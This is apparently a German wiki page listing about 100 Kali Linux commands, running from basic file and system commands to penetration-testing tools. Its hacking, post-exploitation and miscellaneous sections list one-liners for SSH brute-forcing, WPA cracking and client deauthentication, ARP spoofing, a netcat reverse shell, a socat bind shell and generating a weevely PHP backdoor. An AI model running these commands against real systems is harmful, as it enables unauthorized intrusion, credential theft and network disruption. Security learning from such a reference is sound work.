100 Kali Kommandos
Zur Navigation springen
Zur Suche springen
Basic Linux Commands
- Zeigt das aktuelle Arbeitsverzeichnis.
- pwd
- Listet Dateien und Verzeichnisse auf.
- ls
- Wechselt das Verzeichnis.
- cd
- Erstellt ein neues Verzeichnis.
- mkdir <dir>
- Löscht eine Datei.
- rm <file>
- Löscht ein Verzeichnis rekursiv.
- rm -r <dir>
- Kopiert Dateien.
- cp <src> <dest>
- Verschiebt oder benennt Dateien um.
- mv <src> <dest>
- Erstellt eine leere Datei.
- touch <file>
- Gibt den Inhalt einer Datei aus.
- cat <file>
- Öffnet eine Datei im Editor Nano.
- nano <file>
- Öffnet eine Datei im Editor Vim.
- vim <file>
- Sucht eine Datei anhand des Namens.
- find / -name <filename>
- Durchsucht eine Datei nach Textmustern.
- grep "text" <file>
- Zeigt die eingegebenen Befehle der Shell-Historie.
- history
System Information Commands
- Zeigt Systeminformationen.
- uname -a
- Zeigt den aktuellen Benutzer.
- whoami
- Zeigt UID und GID des Benutzers.
- id
- Zeigt die Systemlaufzeit.
- uptime
- Zeigt den belegten Festplattenplatz.
- df -h
- Zeigt die Größe eines Verzeichnisses.
- du -sh <dir>
- Zeigt aktive Prozesse.
- top
- Listet alle Prozesse auf.
- ps aux
- Beendet einen Prozess über die PID.
- kill <PID>
- Interaktiver Prozessmanager.
- htop
User Management Commands
- Erstellt einen neuen Benutzer.
- adduser <username>
- Löscht einen Benutzer.
- deluser <username>
- Ändert das Passwort eines Benutzers.
- passwd <username>
- Fügt einen Benutzer zur sudo-Gruppe hinzu.
- usermod -aG sudo <username>
- Zeigt Gruppenmitgliedschaften eines Benutzers.
- groups <username>
- Ändert Dateiberechtigungen.
- chmod 777 <file>
- Ändert Dateibesitzer und Gruppe.
- chown user:group <file>
Networking Commands
- Zeigt Netzwerkinterfaces an.
- ifconfig
- Zeigt IP-Adressen und Interfaces.
- ip a
- Zeigt Wireless-Interfaces an.
- iwconfig
- Testet Netzwerkverbindung via ICMP.
- ping <IP>
- Zeigt offene Ports mit Prozessen.
- netstat -tulnp
- Scant ein Zielsystem auf offene Ports.
- nmap <IP>
- Zeigt den Routingpfad zu einem Host.
- traceroute <IP>
- Lädt Daten von einer URL herunter.
- curl <URL>
- Lädt eine Datei von einer URL herunter.
- wget <URL>
- Zeigt DNS-Informationen zu einer Domain.
- dig <domain>
- Führt einfache DNS-Abfragen durch.
- nslookup <domain>
Hacking & Penetration Testing
- Startet die Metasploit-Konsole.
- msfconsole
- Erstellt Payloads.
- msfvenom
- Durchsucht Exploit-Datenbanken.
- searchsploit <exploit>
- Testet SQL-Injection gegen eine URL.
- sqlmap -u <URL> --dbs
- Bruteforced SSH-Zugänge.
- hydra -l user -P pass.txt <IP> ssh
- Crackt Hashes mit John the Ripper.
- john --wordlist=rockyou.txt hash.txt
- Aktiviert Monitor-Modus für WLAN.
- airmon-ng start wlan0
- Fängt WLAN-Pakete ab.
- airodump-ng wlan0mon
- Deauthentifiziert Clients.
- aireplay-ng -0 10 -a <BSSID> wlan0mon
- Crackt WPA/WPA2-Passwörter.
- aircrack-ng -w rockyou.txt -b <BSSID> <capture>
- Crackt Hashes mit GPU.
- hashcat -m 2500 hash.txt rockyou.txt
- Führt ARP-Spoofing durch.
- ettercap -T -q -i eth0
- Extrahiert Bilder aus Netzwerktraffic.
- driftnet -i eth0
- Zeichnet Netzwerkpakete auf.
- tcpdump -i eth0
- Analysiert Netzwerkverkehr.
- tshark -i eth0
- Scant Webserver auf Schwachstellen.
- nikto -h <URL>
- Führt Directory-Bruteforce durch.
- gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt
- Scant WordPress auf Schwachstellen.
- wpscan --url <URL>
Privilege Escalation & Post-Exploitation
- Zeigt sudo-Berechtigungen.
- sudo -l
- Wechselt zum root-Benutzer.
- sudo su
- Erstellt eine interaktive Shell in Python.
- python -c 'import pty; pty.spawn("/bin/bash")'
- Startet einen Netcat-Listener.
- nc -lvnp <port>
- Erzeugt eine Reverse-Shell.
- nc <IP> <port> -e /bin/bash
- Zeigt den aktuellen Benutzer in Meterpreter.
- meterpreter> getuid
- Versucht Privilege Escalation in Meterpreter.
- meterpreter> getsystem
- Überträgt Dateien via Meterpreter.
- meterpreter> upload / download <file>
- Öffnet eine System-Shell im Meterpreter.
- meterpreter> shell
- Schlägt mögliche PrivEsc-Exploits vor.
- linux-exploit-suggester
File & Data Encryption
- Verschlüsselt eine Datei.
- gpg -c <file>
- Entschlüsselt eine GPG-Datei.
- gpg -d <file.gpg>
- Verschlüsselt Dateien mit OpenSSL.
- openssl enc -aes-256-cbc -salt -in <file> -out <file.enc>
- Entschlüsselt OpenSSL AES-Dateien.
- openssl enc -d -aes-256-cbc -in <file.enc> -out <file>
Forensics & Steganography
- Extrahiert druckbare Zeichenketten.
- strings <file>
- Analysiert Binärdateien auf Strukturen.
- binwalk <file>
- Extrahiert Dateien aus Images.
- foremost -i <image>
- Zeigt Metadaten einer Datei.
- exiftool <file>
- Findet versteckte Daten in Bildern.
- stegseek <stegfile>
Password & Hash Cracking
- Erkennt Hash-Typen.
- hashid <hash>
- Führt SSH-Bruteforce durch.
- hydra -L users.txt -P passwords.txt ssh://<IP>
- Crackt Passwort-Hashes.
- john hash.txt --wordlist=rockyou.txt
Web Application Testing
- Führt Directory Enumeration durch.
- dirb <URL>
- Führt Web-Fuzzing durch.
- wfuzz -c -z file,wordlist.txt --hc 404 <URL>/FUZZ
- Testet Webanwendungen auf XSS.
- xsssniper -u <URL>
- Testet Webanwendungen auf Command Injection.
- commix --url <URL>
- Startet Burp Suite.
- burpsuite
Miscellaneous
- Erstellt Wordlists.
- crunch 8 8 abcdefghijklmnopqrstuvwxyz
- Führt nmap über Proxychains aus.
- proxychains nmap -sT -Pn <IP>
- Startet den Tor-Dienst.
- tor
- Startet einen MITM-Proxy.
- mitmproxy
- Startet das Social Engineering Toolkit.
- setoolkit
- Erstellt Wordlists aus Webseiten.
- cewl -w words.txt -d 5 <URL>
- Erstellt einen Web-Backdoor mit weevely.
- weevely generate password backdoor.php
- Startet eine bind shell via socat.
- socat TCP-LISTEN:4444,fork EXEC:/bin/bash
- Zeigt Domaininformationen.
- whois <domain>
- Sammelt Mails und Subdomains.
- theHarvester -d <domain> -l 100 -b google
- Crackt ZIP-Passwörter.
- fcrackzip -u -D -p rockyou.txt <file.zip>
- Sucht Subdomains einer Domain.
- dnsmap -d <domain>